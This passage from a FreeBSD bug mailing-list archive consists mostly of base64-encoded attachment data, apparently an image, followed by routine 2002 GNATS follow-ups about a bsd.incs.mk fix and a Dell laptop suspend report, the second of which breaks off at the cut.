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 ------=_NextPart_000_0001_01C23A2E.0244DFD0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Aug 2 13:20: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5B73B37B400 for ; Fri, 2 Aug 2002 13:20:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 08EBB43E5E for ; Fri, 2 Aug 2002 13:20:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g72KK3JU099248 for ; Fri, 2 Aug 2002 13:20:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g72KK3Eh099247; Fri, 2 Aug 2002 13:20:03 -0700 (PDT) Date: Fri, 2 Aug 2002 13:20:03 -0700 (PDT) Message-Id: <200208022020.g72KK3Eh099247@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Johan Karlsson Subject: Re: misc/39765: bsd.incs.mk, INCDIR or INCSDIR ? Reply-To: Johan Karlsson Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR misc/39765; it has been noted by GNATS. From: Johan Karlsson To: ru@freebsd.org, freebsd-gnats-submit@freebsd.org Cc: ijliao@terry.dragon2.net Subject: Re: misc/39765: bsd.incs.mk, INCDIR or INCSDIR ? Date: Fri, 2 Aug 2002 22:11:06 +0200 Hi Ruslan, I think that your MFC of bsd.incs.mk took care of this problem. However, since I'm not 100% sure I would like to get a confirmation from you before closing it. Take care /Johan -- Johan Karlsson mailto:johan@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Aug 2 14:10: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4C21037B400 for ; Fri, 2 Aug 2002 14:10:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id E197A43E77 for ; Fri, 2 Aug 2002 14:10:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g72LA3JU008728 for ; Fri, 2 Aug 2002 14:10:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g72LA3c8008726; Fri, 2 Aug 2002 14:10:03 -0700 (PDT) Date: Fri, 2 Aug 2002 14:10:03 -0700 (PDT) Message-Id: <200208022110.g72LA3c8008726@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Johan Karlsson Subject: Re: i386/34033: Suspend doesn't work on Dell Latitude CPx laptop Reply-To: Johan Karlsson Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR i386/34033; it has been noted by GNATS. From: Johan Karlsson To: 